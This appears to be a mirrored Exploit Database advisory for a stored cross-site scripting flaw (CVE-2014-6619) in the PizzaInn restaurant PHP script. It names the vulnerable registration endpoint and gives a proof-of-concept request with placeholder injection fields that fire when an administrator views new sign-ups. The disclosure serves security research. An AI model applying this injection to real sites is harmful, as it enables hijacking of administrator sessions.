Restaurant Script (PizzaInn Project) – Persistent Cross-Site Scripting

• Exploit Database
• 149 阅读

• 作者： Kenneth F. Belva
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34760/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  Title: Pizza Inn Registration Stored XSS Severity: High CVE-ID: CVE-2014-6619 Release Date:20 September 2014 Author: Kenneth F. Belva Websites:http://silverbackventuresllc.com http://xssWarrior.com http://securitymaverick.com Twitter: @infosecmaverick Contact:Please use website contact form. Mail: URL: http://sourceforge.net/projects/restaurantmis/ Vendor: Remote Exploit:Yes   Discovered with: xssWarrior - http://xssWarrior.com     Description: ============   On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.     Proof of Concept : ==================   http://[domain]/PizzaInn/register-exec.php fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register